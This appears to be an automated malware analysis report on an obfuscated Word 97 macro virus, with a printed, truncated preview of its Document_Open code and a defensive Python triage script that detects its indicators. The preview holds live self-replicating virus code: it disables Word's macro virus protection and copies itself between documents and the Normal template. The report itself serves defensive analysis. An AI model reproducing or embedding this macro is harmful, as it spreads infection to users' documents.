Verdict: MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample contains a VBA macro that runs automatically when the document is opened: the extracted ThisDocument module defines a Document_Open handler (a static finding from the extracted source, not an observed execution). The ClamAV signature name Win.Trojan.W97M-8 classifies it as a Word 97 (W97M) macro trojan. The identifiers in the VBA source are obfuscated into long runs of high-byte characters, but the API calls that survive obfuscation show the classic self-replicating macro-virus pattern rather than a downloader: the handler reads the line counts of the first VBA module in both the active document and the Normal template through VBProject.VBComponents(1).CodeModule, switches off Word's macro virus warning (Application.Options.VirusProtection = False), disables the Cancel key (wdCancelDisabled) and auto-macros (WordBasic.DisableAutoMacros), suppresses the prompt to save Normal, treats a module of more than 169 lines as already infected to decide which of the two modules is copied into the other (exiting if both are), and then walks the source module line by line, stripping the leading apostrophe from lines that were stored as comments so that they become live code again. The remainder of the routine is cut off in the preview, so any later stage (including a download) is not visible here; the visible portion contains no network or shell calls. Note that programmatic access to VBProject is blocked unless "Trust access to the VBA project object model" is enabled in the Trust Center, which it is not by default in current Office versions, so on a modern installation the replication step fails at runtime even if the macro is allowed to run.
Heuristics (3)
- ClamAV: Win.Trojan.W97M-8 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.W97M-8
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open handler present; it executes automatically when the document is opened
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 83337 bytes | b6b060583bed0b013dd0c28257b6c1939cb02fcf6b7c259584d3667707a01030 |
Preview script (first 1,000 lines of the extracted script; the preview itself is cut off where marked "(truncated)")

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
ºž¦øŒûŠÝ‘ªŠ§ºÞ—�Ýúø¦ª…Ì¡ÀÏ’�ÈÑ÷›¶®Ê£øˆœØ = "òßí¾˜¢®–†¾Ýåê"
¡áôÈ÷ëšß±�œ““«çè¤Â͆È⛋¯Êæï«Â�ÃÙ¹ = "¡„¨¥‘ù�”Åð"
×Ö¤žªÑ¶�ß’Ë´°À„º ²Œæ°Øäœê©ÐÆÄ©¥¿Å¹Õ™©‘† = "®Ï†‡¥Ö½›˜è²Ýðæë¯"
ÔÑ…ÂÅ™Üã½�áŸú—™£Ä©Ýä‡Öæ§ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúŒã«òÑâ¨ð˜ = "¼±»ã©—îò¹¡â¦–Ì"
ޣل⿈�²„Œè¯çа®¦ßŠ«§Ï›âÕʆ¼ìÍÐÏ = "ˉțꋇðݼ¯�ŠàÁ Ò"
Ëã§“ÜÖ“Ìç—¬¸Ÿ…š˜›�⿺˜ôì§™ÜÓɨ޿ = "®§Éá„Â"
ÈúôªòÎú¸À‹ÞˆÊ™»×»ìéɸ Ö”úù™›æóªŠ¼©ÒըЄóàŒ”œ‰èõáÔ™§±¸ = "ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆Æèѽ®…ñµ�ÖÖ"
¦‚ŠÁêɦµÙ¿ ò¤çïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¬ÁÚ†¿èòÇ’‚ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú너䕅±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ„Ô݉™¯Õè´ÓÖ±¤ = "àßÓ×›Â�½±„„“�Ê�"
¬Ôžºæ¹„À�ó”°µ™ñփׇτ‚õí�ÊÔžºæ¹„À�ó”°µ™ñփׇτ‚õí“‘»£ðÂÆ¤”Ì‹ÈàÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú‚Î…Ö¼âŸÎ�¡¤¾šÉ¡ä̛ŦËé = "”ëˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúÅò"
Çôû«åÔšÅÇÉìÀ¼¡ÃË´�ÀšŸªÈØÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú®½Úá°”¾ÛšÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúÞÅ”ÏÁÅ� = "íéæùÊ›À‘„Ù»ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúã"
ª”ßÒ�˨ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑáÑŸúť䉵鹇‡‹¾Á‡½¼Ú‚¦ = "²�Ѳ‚–ܡ츔½ÏÓÔžºæ¹„À�ó”°µ™ñփׇτ‚õíÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú"
Ðäǯ¾ïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú�…Óîˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆Æèч£¥ƒˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÕ×½¸ÊÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúï® = "�ºÙª"
ߋȮ‚Î…Ö¼âŸÎÏŠøô†ÌŸ¡¾¹ùŠˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ™Ýà–ß݃ӉÝç„…ì½àë = "»ïˆ˜®Ëð©ƒ�¯§�£Ô"
’èГ†ùàÆ�’›…„§¯®»½éº = "¡›ê´ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆Æèѹó‹™×ï²ðˆ"
ÇéÛêÝô¨í‚¸ô‡ËÆèç¹Ù�êۈ䕅±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÒ쵚„Þ = "ƒÞ‡á±¥ª"
ƒÛÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†ö½½öù–‚Î…Ö¼âŸÎ‚Î…Ö¼âŸÎ¼ÚìÜèÈéµùÌÛ–ò”Ä = "§‚Î…Ö¼âŸÎ“ö•éצµ¾„§®ë"
ƒÛÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†ö½½öù–‚Î…Ö¼âŸÎ‚Î…Ö¼âŸÎ¼ÚìÜèÈ鵯Î֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†ÚôÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†Þ¨è¸–ÐÔžºæ¹„À�ó”°µ™ñփׇτ‚õíòÙ = "¦ÜßçÅÀÏ‘¯�¨Ë�"
Ýå ‚Î…Ö¼âŸÎê«à˜°ÈÉïˆÍž•ó‘ò’¼Ïëˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèѪʈ䕅±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèѺ¬ªÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†‚ëØ¸ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúµÙ¢Éó Žð臽¿‹Œ×ê÷•¨ = "�×Ö¤žªÑ¶�ߒ˘°êÂÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúâÞߨë‰É¢ãã¡æÔžºæ¹„À�ó”°µ™ñփׇτ‚õíÎãŒÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúìÙÍ¢¹ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑêæÆ¡Û"
ƒÛÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†ö½½öù–‚Î…Ö¼âŸÎ‚Î…Ö¼âŸÎ¼ÚìÜèÈ鵯¨åÚ¥ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†¢Ôº‚Î…Ö¼âŸÎï = "´˜ÄÔžºæ¹„À�ó”°µ™ñփׇτ‚õíŸÂõ§ö¢ïç"
ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ = ActiveDocument.VBProject.VBComponents(1).CodeModule.countoflines
ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú = NormalTemplate.VBProject.VBComponents(1).CodeModule.countoflines
Application.Options.VirusProtection = False
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.SaveNormalPrompt = False
If ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ > 169 And ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú > 169 Then Exit Sub
If ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú > 169 Then
Set ó Žð臽¿‹Œ×ê÷• = ActiveDocument
Set ø†½É²ôîò�¹à¢…õ¬úæ»úÀº¢ = NormalTemplate
GoTo •à˜°ÈÉïˆÍž•ó‘ò’¼Ïë欀 ÖÌÓÙ£¡µˆÁÀÒé§’ë ±å
End If
If ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú < 170 Then
Set ó Žð臽¿‹Œ×ê÷• = NormalTemplate
Set ø†½É²ôîò�¹à¢…õ¬úæ»úÀº¢ = ActiveDocument
End If
ReDim ÖÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†¦šˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèѾÆëÝæ³ˆ³–¦Ôžºæ¹„À�ó”°µ™ñփׇτ‚õí“ð¥ÅÅéß(50, 50)
‚Î…Ö¼âŸÎ = ø†½É²ôîò�¹à¢…õ¬úæ»úÀº¢.VBProject.VBComponents(1).CodeModule.countoflines
ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ = 0
Do Until ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ = ‚Î…Ö¼âŸÎ
ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ = ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ + 1
Ðäǯ¾ïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú�…ÓîÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†‡£¥ƒˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÕ×½¸ = ø†½É²ôîò�¹à¢…õ¬úæ»úÀº¢.VBProject.VBComponents(1).CodeModule.Lines(ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ, 1)
If Left(Ðäǯ¾ïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú�…ÓîÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†‡£¥ƒˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÕ×½¸, 1) = "'" Then
èêÀ = Len(Ðäǯ¾ïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú�…ÓîÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†‡£¥ƒˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÕ×½¸)
Ðäǯ¾ïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú�…ÓîÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†‡£¥ƒˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÕ×½¸ = Mid(Ðäǯ¾ïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú�…ÓîÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†‡£¥ƒˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÕ×½¸, 2, èêÀ)
™Ý¾õˆä•… ... (truncated)
```
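The insight paragraph and the preview above both turn on the same few API calls that obfuscation cannot hide. The following Python is an added triage example written for this report (it is not the analyzer's code and not part of the sample): it scans VBA source of the kind olevba writes to macros.bas for those indicators, measures how much of the code outside string literals is non-ASCII as a rough obfuscation score, models the 169-line infection marker from the preview's branch, and reverses the preview's comment-stripping step. The indicator names, the regexes and the constructed SAMPLE_VBA text (readable names standing in for the obfuscated identifiers) are assumptions made for the example; only the API calls and the threshold come from the preview.

```python
import re

# Indicators that survive identifier obfuscation in the preview: an
# auto-executing handler, programmatic access to the VBA project, Normal
# template targeting and tampering with Word's protection settings.
# Names and patterns are this example's own, not analyzer heuristic IDs.
INDICATORS = {
    "auto-exec handler": re.compile(
        r"^\s*(?:Private\s+|Public\s+)?Sub\s+(?:Document_Open|AutoOpen|AutoExec|AutoClose)\b",
        re.I | re.M),
    "VBProject access": re.compile(r"\.VBProject\.VBComponents", re.I),
    "code module read/write": re.compile(
        r"\.CodeModule\.(?:Lines|CountOfLines|InsertLines|AddFromString|DeleteLines)\b", re.I),
    "Normal template target": re.compile(r"\bNormalTemplate\b", re.I),
    "virus protection off": re.compile(r"Options\.VirusProtection\s*=\s*False", re.I),
    "auto-macros disabled": re.compile(r"WordBasic\.DisableAutoMacros", re.I),
    "cancel key disabled": re.compile(r"EnableCancelKey\s*=\s*wdCancelDisabled", re.I),
    "save-Normal prompt off": re.compile(r"Options\.SaveNormalPrompt\s*=\s*False", re.I),
}

STRING_LITERAL = re.compile(r'"[^"\n]*"')


def scan_indicators(vba: str) -> dict:
    """Count matches of each indicator in the VBA source."""
    return {name: len(rx.findall(vba)) for name, rx in INDICATORS.items()}


def non_ascii_ratio(vba: str) -> float:
    """Share of non-whitespace characters outside string literals that are
    non-ASCII.  Hand-written VBA is almost entirely ASCII; identifiers like
    the ones in the preview push this figure up sharply."""
    code = STRING_LITERAL.sub('""', vba)
    chars = [c for c in code if not c.isspace()]
    if not chars:
        return 0.0
    return sum(1 for c in chars if ord(c) > 0x7F) / len(chars)


def uncomment_hidden_lines(lines):
    """Reverse the step in the preview's loop: a line whose first character
    is an apostrophe has it removed, turning a VBA comment back into live
    code (Left(line, 1) = "'" -> Mid(line, 2, Len(line)))."""
    return [line[1:] if line.startswith("'") else line for line in lines]


def replication_direction(doc_lines: int, normal_lines: int, marker: int = 169):
    """Model of the branch in the preview: a first module with more than
    `marker` lines is treated as already carrying the virus body.  Returns
    (module read from, module written to), or None when both are over the
    marker (the macro does Exit Sub).  The write side is cut off in the
    preview; the read side is the object whose CodeModule.Lines is read."""
    if doc_lines > marker and normal_lines > marker:
        return None
    if normal_lines > marker:
        return ("NormalTemplate", "ActiveDocument")
    return ("ActiveDocument", "NormalTemplate")


def classify(vba: str) -> str:
    """Rough verdict: auto-exec plus VBProject access plus code-module
    manipulation is the self-replication pattern; auto-exec alone is only
    suspicious."""
    hits = scan_indicators(vba)
    if hits["auto-exec handler"] and hits["VBProject access"] and hits["code module read/write"]:
        return "self-replicating macro virus pattern"
    if hits["auto-exec handler"]:
        return "auto-executing macro"
    return "no auto-exec indicator"


# Constructed sample: the preview's statements with readable names in place
# of the obfuscated identifiers (one left non-ASCII on purpose).  This is
# NOT the real macro from macros.bas.
SAMPLE_VBA = '''Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
ÆÎÖ = "òßí"
docLines = ActiveDocument.VBProject.VBComponents(1).CodeModule.countoflines
nrmLines = NormalTemplate.VBProject.VBComponents(1).CodeModule.countoflines
Application.Options.VirusProtection = False
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.SaveNormalPrompt = False
If docLines > 169 And nrmLines > 169 Then Exit Sub
'Set tgt = NormalTemplate
line = src.VBProject.VBComponents(1).CodeModule.Lines(i, 1)
If Left(line, 1) = "'" Then line = Mid(line, 2, Len(line))
End Sub
'''

if __name__ == "__main__":
    for name, count in scan_indicators(SAMPLE_VBA).items():
        print(f"{count:2d}  {name}")
    print("obfuscation ratio:", round(non_ascii_ratio(SAMPLE_VBA), 3))
    print("verdict:", classify(SAMPLE_VBA))
    print("replication:", replication_direction(40, 200))
```

To use it on the real artifact, read macros.bas (as written by olevba) into a string and pass it to scan_indicators, non_ascii_ratio and classify; the obfuscation ratio on the preview's identifiers will be far higher than the constructed sample's, and the triad of auto-exec, VBProject access and CodeModule.Lines is what separates this W97M pattern from a plain auto-open macro.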